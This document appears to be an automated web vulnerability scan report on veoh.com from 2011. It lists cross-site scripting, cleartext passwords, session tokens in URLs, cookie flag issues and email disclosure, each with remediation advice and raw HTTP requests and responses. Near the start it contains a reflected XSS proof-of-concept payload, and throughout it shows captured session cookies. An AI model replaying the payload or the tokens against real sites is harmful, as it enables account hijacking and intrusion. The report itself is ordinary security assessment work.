<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <input type="hidden" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1" id="flagUserAgent" name="flagUserAgent"/> ...[SNIP]...
2. Cleartext submission of password
There are 8 instances of this issue:
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
5. Cookie without HttpOnly flag set
There are 4 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rest/v2/execute.xml?apiKey=5697781E-1C60-663B-FFD8-9B49D2B56D36&method=veoh.video.findByPermalink&permalink=v18978294NGnK88j8& HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
The following cookie was issued by the application and does not have the HttpOnly flag set:
veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
6. Password field with autocomplete enabled
There are 8 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3digxLTa3XKZOdgQfJltnlDw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CF0QuAIwCQ\\x26amp;q\\x3dsmartdesis\\x26amp;usg\\x3dAFQjCNGfJXOedr8EFUHoDTuNwPlaSxDDIA\\x22\\x3e\\x3cdiv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=B57D97F4-FEFC-1CDA-FD1E-C2AF21F84319&LastUpdate=03/Feb/2011:12:30:37 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:37 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 134607
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:27:56 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=92 Content-Length: 135910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v189741093prNNZM5 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:28:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=98 Content-Length: 134924
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:29:02 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=91 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed."> ...[SNIP]... <a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port "> ...[SNIP]... <a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise"> ...[SNIP]...
The following email addresses were disclosed in the response:
advertising@veoh.com
u3@veoh.com
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
